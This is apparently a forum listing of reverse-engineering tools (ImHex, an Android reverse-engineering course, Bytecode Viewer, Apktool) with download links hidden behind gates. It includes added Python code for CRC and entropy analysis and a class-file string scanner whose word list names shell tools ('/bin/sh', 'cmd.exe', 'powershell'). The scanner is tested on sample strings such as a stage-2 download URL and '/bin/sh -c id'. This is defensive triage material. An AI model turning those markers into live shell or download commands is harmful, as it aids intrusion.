- Fixed crash when passing a value as an auto parameter to a function

[hide][Hidden Content]]
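Two of the analyses listed above, the CRC with custom initial value and polynomial and the entropy graph behind the encrypted/compressed detection, are small enough to reimplement and worth understanding before trusting what any hex editor shows. The following is an added example written for this post, not ImHex's code: the CRC uses the common width/poly/init/reflect/xorout parameter model, and the 256-byte block size and 7.0 bits-per-byte threshold are this example's own choices, not ImHex's.

```python
"""A parameterised CRC and a per-block entropy graph, as a hex editor's
analyzer computes them. Added example, not ImHex code."""
import math
from collections import Counter


def _reflect(value: int, width: int) -> int:
    """Bit-reverse the low `width` bits of value."""
    result = 0
    for _ in range(width):
        result = (result << 1) | (value & 1)
        value >>= 1
    return result


def crc(data: bytes, width: int, poly: int, init: int,
        refin: bool, refout: bool, xorout: int) -> int:
    """Bitwise CRC in the width/poly/init/refin/refout/xorout model (width >= 8).

    Trying custom poly/init values against a checksum field is how you
    confirm a guessed CRC in an undocumented file format.
    """
    assert 8 <= width <= 64
    topbit = 1 << (width - 1)
    mask = (1 << width) - 1
    reg = init & mask
    for byte in data:
        if refin:
            byte = _reflect(byte, 8)
        reg ^= byte << (width - 8)
        for _ in range(8):
            reg = ((reg << 1) ^ poly) & mask if reg & topbit else (reg << 1) & mask
    if refout:
        reg = _reflect(reg, width)
    return reg ^ xorout


# Common parameter sets; the "check" value is the CRC of b"123456789".
def crc32_ieee(data: bytes) -> int:          # check 0xCBF43926
    return crc(data, 32, 0x04C11DB7, 0xFFFFFFFF, True, True, 0xFFFFFFFF)


def crc16_ccitt_false(data: bytes) -> int:   # check 0x29B1
    return crc(data, 16, 0x1021, 0xFFFF, False, False, 0x0000)


def crc16_arc(data: bytes) -> int:           # check 0xBB3D
    return crc(data, 16, 0x8005, 0x0000, True, True, 0x0000)


def shannon_entropy(block: bytes) -> float:
    """Bits of entropy per byte, 0.0 (constant) to 8.0 (every value equally often)."""
    n = len(block)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(block).values()) or 0.0


def entropy_graph(data: bytes, block_size: int = 256) -> list:
    """Per-block entropies: the series a hex editor plots as its entropy graph."""
    return [shannon_entropy(data[i:i + block_size])
            for i in range(0, len(data), block_size)]


def looks_encrypted_or_compressed(data: bytes, block_size: int = 256,
                                  threshold: float = 7.0) -> bool:
    """Heuristic: average block entropy above threshold (example value 7.0).
    Text, code and structured formats sit well below 7 bits/byte; ciphertext
    and compressed streams sit near 8. Zero padding and short files lower the
    average, so check the graph, not just this flag."""
    graph = entropy_graph(data, block_size)
    return bool(graph) and sum(graph) / len(graph) > threshold


if __name__ == "__main__":
    # Constructed sample: a zero-filled block followed by one block holding
    # every byte value exactly once (maximal 8.0-bit entropy).
    sample = b"\x00" * 256 + bytes(range(256))
    print(hex(crc32_ieee(b"123456789")), hex(crc16_ccitt_false(b"123456789")))
    print(entropy_graph(sample))                  # [0.0, 8.0]
    print(looks_encrypted_or_compressed(sample))  # False: average is 4.0
```

A practical caveat the graph shows and the single flag hides: a packed executable usually has a low-entropy stub and headers followed by one high-entropy region, so look for the step in the per-block series rather than relying on the file-wide average.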
  23. Description

As Android security is trending nowadays, it's very necessary to learn about reverse engineering Android applications. This short course will give you a firm foundation to start your journey in Android reverse engineering. Firstly, we will be covering some of the most used tools in Android reverse engineering. Then we will move on to topics like decompiling, understanding smali, patching applications, etc. You will learn to extract the decompiled source code and understand the working of the application.

Unlike other courses, we won't be wasting half of our time setting up labs; we will be diving straight into our topics. Similarly, I won't be wasting your time by explaining unwanted stuff and theory which is of no help. This is a highly practical course, so we will learn mostly everything by reversing our custom-made crackme applications rather than just looking at theory and slides. Unlike earlier days, many applications are built using React Native and Flutter, so we will reverse Flutter and React Native applications too. We will also be reversing .so objects using tools like Ghidra. After completing this course, I'm sure that you will have developed the foundation to reverse, understand and patch basic Android applications. You will be able to do basic Android reverse engineering challenges.

NOTE: This is an ongoing course; remaining contents will be added weekly.

Who this course is for:
- CTF Players
- Bug Hunters
- Security Enthusiasts
- Anyone who's interested in Android Reverse Engineering

Requirements
- Some programming background is assumed
- Windows PC

[Hidden Content] [hide][Hidden Content]]
  24. Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It's written completely in Java, and it's open source. It's currently being maintained and developed by Konloch.

There is also a plugin system that allows you to interact with the loaded classfiles; for example, you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins or write your own. It supports Groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, which allows the user to handle it completely using ASM.

Code from various projects has been used, including but not limited to:
- J-RET by WaterWolf
- JHexPane by Sam Koivu
- RSynaxPane by Robert Futrell
- Commons IO by Apache
- ASM by OW2
- FernFlower by Stiver
- Procyon by Mstrobel
- CFR by Lee Benfield
- CFIDE by Bibl
- Smali by JesusFreke
- Dex2Jar by pxb1..?
- Krakatau by Storyyeller
- JD GUI/JD Core by The Java-Decompiler Team
- Enjarify by Storyyeller

Key Features:
- Krakatau Integration for Bytecode assembly/disassembly.
- Smali/BakSmali Integration – You can now edit class files/dex files via smali!
- APK/DEX Support – Using Dex2Jar and Jar2Dex it's able to load and save APKs with ease!
- Java Decompiler – It utilizes FernFlower, Procyon, and CFR for decompilation.
- Bytecode Decompiler – A modified version of CFIDE's.
- Hex Viewer – Powered by JHexPane.
- Each Decompiler/Editor/Viewer is toggleable; you can also select what will display on each pane.
- Fully Featured Search System – Search through strings, functions, variables and more!
- A Plugin System With Built-In Plugins (Show All Strings, Malicious Code Scanner, String Decrypters, etc.)
- Fully Featured Scripting System That Supports Groovy.
- EZ-Inject – Graphically insert hooks and debugging code, invoke main and start the program.
- Recent Files & Recent Plugins.
- And more! Give it a try for yourself!

[hide][Hidden Content]]
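What the built-in Show All Strings and Malicious Code Scanner plugins do at bottom is walk each class's constant pool, collect the CONSTANT_String entries and match them against a word list. The following is an added example, not Bytecode Viewer code: BCV plugins receive ASM ClassNode objects from Java or Groovy, whereas this stand-alone Python reads the class file format directly so the same result can be reproduced outside the GUI. The SUSPICIOUS word list and the sample class produced by build_sample_class() are this example's own constructions.

```python
"""Extract string literals from a Java class file's constant pool and flag
the ones worth a closer look. Added example, not Bytecode Viewer code."""
import struct

CONSTANT_UTF8 = 1
CONSTANT_CLASS = 7
CONSTANT_STRING = 8
# Byte length of every fixed-size constant_pool entry, not counting its tag.
# Long (5) and Double (6) additionally occupy two pool slots (JVM spec 4.4.5).
FIXED_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
               12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def parse_constant_pool(data: bytes) -> dict:
    """Return {index: (tag, value)}; Utf8 values decoded, others left as raw bytes."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pool, off, idx = {}, 10, 1
    while idx < count:
        tag = data[off]
        off += 1
        if tag == CONSTANT_UTF8:
            (length,) = struct.unpack_from(">H", data, off)
            off += 2
            # The JVM stores "modified UTF-8" (NUL as C0 80, supplementary
            # characters as surrogate pairs). Plain UTF-8 is close enough for
            # listing strings, so undecodable bytes are replaced, not fatal.
            pool[idx] = (tag, data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag in FIXED_SIZES:
            size = FIXED_SIZES[tag]
            pool[idx] = (tag, data[off:off + size])
            off += size
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off - 1}")
        idx += 2 if tag in (5, 6) else 1
    return pool


def string_literals(pool: dict) -> list:
    """Only CONSTANT_String entries are literals. Bare Utf8 entries also hold
    class names, method names and descriptors, so listing every Utf8 entry
    would bury the interesting strings."""
    out = []
    for tag, value in pool.values():
        if tag == CONSTANT_STRING:
            (utf8_index,) = struct.unpack(">H", value)
            out.append(pool[utf8_index][1])
    return out


# Example markers for a first-pass triage of literals (this example's own list).
SUSPICIOUS = ("http://", "https://", "/bin/sh", "cmd.exe", "powershell",
              "Runtime", "ProcessBuilder", "loadLibrary", "defineClass")


def scan_suspicious(strings: list) -> list:
    return [s for s in strings if any(marker in s for marker in SUSPICIOUS)]


def build_sample_class(strings: list, class_name: str = "Demo") -> bytes:
    """Constructed input: class file header plus a constant pool holding the
    given literals. Enough for the parser above; not a loadable class."""
    entries = []

    def utf8(text: str) -> int:
        encoded = text.encode("utf-8")
        entries.append(bytes([CONSTANT_UTF8]) + struct.pack(">H", len(encoded)) + encoded)
        return len(entries)  # constant pool indices start at 1

    this_class_name = utf8(class_name)
    entries.append(bytes([CONSTANT_CLASS]) + struct.pack(">H", this_class_name))
    for text in strings:
        entries.append(bytes([CONSTANT_STRING]) + struct.pack(">H", utf8(text)))
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, len(entries) + 1)
    return header + b"".join(entries)


if __name__ == "__main__":
    sample = build_sample_class(["Hello, world",
                                 "https://example.invalid/stage2.bin",
                                 "/bin/sh -c id"])
    found = string_literals(parse_constant_pool(sample))
    print(found)
    print(scan_suspicious(found))
```

To run it on a real class, read the file bytes and pass them to parse_constant_pool(); for an APK you would first convert with Dex2Jar as BCV does, since DEX files use a different string table. Obfuscated samples defeat the word list by building strings at runtime, which is exactly the case the String Decrypters plugins exist for.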
  25. It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step. Also, it makes working with the app easier because of its project-like file structure and automation of some repetitive tasks like building an apk, etc.

Features
- Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png and XMLs)
- Rebuilding decoded resources back to binary APK/JAR
- Organizing and handling APKs that depend on framework resources
- Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
- Helping with repetitive tasks

Changelog v2.6.1
- Begin options refactor by @iBotPeaches in #2648
- fix: decoding references to private resources by @MrIkso in #2650
- fix: support for signature scheme v4 by @iBotPeaches in #2705
- Replace use of deprecated methods with their recommended replacements by @alsutton in #2713
- Update dependencies by @Goooler in #2715
- Cleanup trailing temp files/folders by @iBotPeaches in #2742
- fix: prevent file hold on tmpDir during build by @iBotPeaches in #2745
- refactor: drop unused exceptions by @iBotPeaches in #2746
- Preventing instantiation of untrusted classes. by @iBotPeaches in #2760

[hide][Hidden Content]]